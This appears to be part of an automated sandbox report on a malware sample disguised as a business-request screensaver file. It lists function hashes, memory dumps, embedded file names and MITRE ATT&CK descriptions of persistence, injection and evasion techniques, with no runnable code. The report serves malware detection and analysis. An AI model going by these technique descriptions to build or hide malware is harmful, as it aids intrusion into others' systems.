String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 0061AF20 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 0060ECD8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Uniqueness

Uniqueness Score: -1.00%

Function 0061E151 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7cfceff21a98199a1ea8a8668d5dec9ef415c6f2e266751c87e6400710a77e
Instruction ID: f398565a4d469fe0fc5d7de2e4565db81f59a321f282b3aabce81a220e4a218c
Opcode Fuzzy Hash: 5b7cfceff21a98199a1ea8a8668d5dec9ef415c6f2e266751c87e6400710a77e
Instruction Fuzzy Hash: A2C04CB4C05255DEDB68DF2598053957BB2FBA4301F2880A7840F92211E7310586AF41

Uniqueness

Uniqueness Score: -1.00%

Function 00616710 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580

Uniqueness

Uniqueness Score: -1.00%

Function 007DD5C0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
Instruction ID: cfd3c94acb28e12ede7e7a80c62375d018fe088f1f186957f4485c32e65079b3
Opcode Fuzzy Hash: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
Instruction Fuzzy Hash: 6CB092301602088F82009A59E448C0137ACAF08A0434100D0E1088B632C621F8008A51

Uniqueness

Uniqueness Score: -1.00%

Function 007D7F99 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86bdee94e5692a436ae035627e64b13746d57cd7c7f4352909ec0fa1e64ba9d6
Instruction ID: 8d1e96b61da51a86ff123e30a417b08c82b604f31c6c5a8c388ce71e64102012
Opcode Fuzzy Hash: 86bdee94e5692a436ae035627e64b13746d57cd7c7f4352909ec0fa1e64ba9d6
Instruction Fuzzy Hash: 6FC09B2010D7C4CFC723866459313902F709B07B00F5D88D389819A7D7C10D5416D332

Uniqueness

Uniqueness Score: -1.00%

Function 04EFF530 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 496d0f802e1b1dc2c93f70dfafe2c5f07b66e113ae36ebd85902c8d74fb1225d
Instruction ID: 46a8281cb2ba43c5890994f586faf0f659945039c255adabb842a3d1801647d6
Opcode Fuzzy Hash: 496d0f802e1b1dc2c93f70dfafe2c5f07b66e113ae36ebd85902c8d74fb1225d
Instruction Fuzzy Hash: 21A0223000AF0C828200B2B23002028338C088020838000BAA30C0AA220E33E0A08088

Uniqueness

Uniqueness Score: -1.00%

Function 0061A8D9 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3310aa2e261b35d84c2c6ae4815de33f4d41c4c5bddfaa85d8d677339f10b60
Instruction ID: 9eb983053df3908c9cbfbe989ae1435fac61beeeaa76844b070ce2a8fff3baab
Opcode Fuzzy Hash: a3310aa2e261b35d84c2c6ae4815de33f4d41c4c5bddfaa85d8d677339f10b60
Instruction Fuzzy Hash: EFB0927060A2008BDB00EF6194842BA77A39B84200F24903A850646288C63499C39682

Uniqueness

Uniqueness Score: -1.00%

Function 04EF5DA0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78295c5b4ae89527a1d14203901987d146d52366f53fc9456bad769984ab1550
Instruction ID: 0fca22947913397e6c175a070cdcbb5e7cd669bd97768fca039def9563acfe0f
Opcode Fuzzy Hash: 78295c5b4ae89527a1d14203901987d146d52366f53fc9456bad769984ab1550
Instruction Fuzzy Hash: 4790023104464C8B85406B95B80A559F75C96545197A04451B50D416125AA564145695

Uniqueness

Uniqueness Score: -1.00%

Function 04EFF590 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecbf756409264bc92ebdb0b9c9b4dd052f625ec824f2deee09e2cd69db635026
Instruction ID: d9bd390cda27181e3a600afb4c38db13529a44ee57ba23af33e6072c0031a2de
Opcode Fuzzy Hash: ecbf756409264bc92ebdb0b9c9b4dd052f625ec824f2deee09e2cd69db635026
Instruction Fuzzy Hash: 3D902230000A0C8B038023803808082338CC8A02223800020A00C000020B0020000088

Uniqueness

Uniqueness Score: -1.00%

Function 0061E9A0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab4d2468f251aac62a6e0a5161409fe418866820c8adf738ab73d377e5970c4
Instruction ID: cd56d7afd6b2e75c8eace2ab80ca48314e8f08cd305c2ef3e1787eee0505527d
Opcode Fuzzy Hash: cab4d2468f251aac62a6e0a5161409fe418866820c8adf738ab73d377e5970c4
Instruction Fuzzy Hash: 6C90023104560C8F4A502BD97809557775CA5545157840153A50D815156A5564145596

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0060BC48 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

(p, xrefs: 0060BE12
4'p, xrefs: 0060BCCC
pp, xrefs: 0060BD9F
4'p, xrefs: 0060BD1A
4'p, xrefs: 0060BD92
4'p, xrefs: 0060BCFC

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$4'p$4'p$4'p$4'p$pp
API String ID: 0-2991777393
Opcode ID: 48adef2b701ac1f0a977226aa464afd0f82ccbf9448a8fb6d6ace4d5e146c9d2
Instruction ID: 51bbb851bd687c5f25d36c55d1ede338545d90903d63d6bcc3c3f73b7ebb071e
Opcode Fuzzy Hash: 48adef2b701ac1f0a977226aa464afd0f82ccbf9448a8fb6d6ace4d5e146c9d2
Instruction Fuzzy Hash: 4ED17F32600214DFCB19CF58D854E9ABBB2FF88310F1584A9E509AB276CB32ED55DF91

Uniqueness

Uniqueness Score: -1.00%

Function 006082D8 Relevance: 6.6, Strings: 5, Instructions: 370COMMON

Download Yara Rule

Strings

(p, xrefs: 006084FA
(p, xrefs: 00608443
(p, xrefs: 006083EC
(p, xrefs: 00608526
(p, xrefs: 00608621

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$(p$(p$(p$(p
API String ID: 0-1887976078
Opcode ID: 620e9ddf45b8b61b557165426dfeea2dcf424196f4d5a1dff102b75eee6b0140
Instruction ID: 417b660ea951130f4e31079afe546d5cb458febdbbdb51723137245171534d81
Opcode Fuzzy Hash: 620e9ddf45b8b61b557165426dfeea2dcf424196f4d5a1dff102b75eee6b0140
Instruction Fuzzy Hash: 63C113323047519FCB19DB68E850AAF3BE2EFC5714B19446AE849CB3D6CE35DC0687A1

Uniqueness

Uniqueness Score: -1.00%

Function 0060E648 Relevance: 5.5, Strings: 4, Instructions: 494COMMON

Download Yara Rule

Strings

@;R, xrefs: 0060E7E7
(p, xrefs: 0060EB7A
, xrefs: 0060EAB6
XRp, xrefs: 0060E7CB

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: $(p$@;R$XRp
API String ID: 0-3658829951
Opcode ID: d2c478b45bb21f2ffe81327e7596013ca5ad3527451068bff5a9f8b3a7e75467
Instruction ID: 8d33cdf94a704aeebbac5e1ceffccb75aae9ad0bd63546540eff9a2ff9b89d53
Opcode Fuzzy Hash: d2c478b45bb21f2ffe81327e7596013ca5ad3527451068bff5a9f8b3a7e75467
Instruction Fuzzy Hash: C80239357405208FCB58DB28C899A6A77F2FF89711B2949A9E106CF3B5CB72DC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0060F6F0 Relevance: 5.2, Strings: 4, Instructions: 182COMMON

Download Yara Rule

Strings

(_p, xrefs: 0060FE31
(_p, xrefs: 0060FDB5
(_p, xrefs: 0060FDAB
(_p, xrefs: 0060FDFB

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (_p$(_p$(_p$(_p
API String ID: 0-1436489877
Opcode ID: 1d8d68b0b6f9832c6ec5d2551c097d752dcb5a830c1a62d08a74f9798b31f798
Instruction ID: 4538ffb75c660e90a29412b367de1e2f3371f4a07ad71cb74d87f5f28c5999d2
Opcode Fuzzy Hash: 1d8d68b0b6f9832c6ec5d2551c097d752dcb5a830c1a62d08a74f9798b31f798
Instruction Fuzzy Hash: 2361E474B043019FC7199B78D4655AEBFB2EF86300B2584BEE4069B7A2EB31DC42CB51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Kbojz.exePID: 3552, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	153
Total number of Limit Nodes:	3

Executed Functions

Function 020F121A Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.406985020.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20f0000_Kbojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8127610cb297f2f7d25b342f01b80faed1830ee6d98fa81afb6536426a61ea
Instruction ID: 030c8bd678dc81cbc809196f6711e6cb6f0c2a34e154a27bc72f05934e93983b
Opcode Fuzzy Hash: cd8127610cb297f2f7d25b342f01b80faed1830ee6d98fa81afb6536426a61ea
Instruction Fuzzy Hash: 2B815A35A50214DFCB45DFA8D894A6DBBB2FF89310B1580A9E9059B362CB30EC41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 020F1228 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.406985020.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20f0000_Kbojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcfd96699ef62fc429ced85042a0d2726ded5fd2d71b9d3e3e075fe53ae7646c
Instruction ID: df069944348b134923208f5f4f8cdcfed668ad0cfab615c7d294bb293ffea59d
Opcode Fuzzy Hash: bcfd96699ef62fc429ced85042a0d2726ded5fd2d71b9d3e3e075fe53ae7646c
Instruction Fuzzy Hash: 64713930B50214DFCB45DFA8D898A6DB7B6FF89700F1440A9E90A9B3A1CB34AC45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 020F2200 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.406985020.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20f0000_Kbojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba5aadaadfdc8e70471a50010964acd4cd0a4744892af6adef29c418763cc2f
Instruction ID: 6f1b382b0d05d121949f2a7ef125b6ae9b650350a6d56e3d2c2bdbb53d495c55
Opcode Fuzzy Hash: 3ba5aadaadfdc8e70471a50010964acd4cd0a4744892af6adef29c418763cc2f
Instruction Fuzzy Hash: 8E21A870B00A19CFCB05EFA8D44446EB7B6FF89300B10456AD91697360EF74AA46CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 020FEA08 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.406985020.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20f0000_Kbojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3ce9de3b663e8dec096eb4c5d1d6e2ef0b5e4cf50817dda5fb856cbd464b08
Instruction ID: 758579f32321b1c55df120e9c34b5e773a646c70b55392bb744bae63357dba35
Opcode Fuzzy Hash: 9c3ce9de3b663e8dec096eb4c5d1d6e2ef0b5e4cf50817dda5fb856cbd464b08
Instruction Fuzzy Hash: 67E0923884D3889FC741DF68C96416CBFF4EF46204F1480DEC984572A2D7325E46DB61

Uniqueness

Uniqueness Score: -1.00%

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEpqbjur.exe. vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000000.333331154.0000000000084000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEpqbjur.exe. vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000021F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXvpwbop.exe" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000021F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameQhvpifi.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000241E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359319298.0000000005D54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEpqbjur.exe. vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.0000000000784000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameClassLibrary1.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDglpobuyba.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClassLibrary1.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420150231.0000000000864000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClassLibrary1.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetZip.dll@ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003830000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDglpobuyba.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDglpobuyba.dll" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.418995567.00000000004D4000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXvpwbop.exe" vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Binary or memory string: OriginalFilenameEpqbjur.exe. vs UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

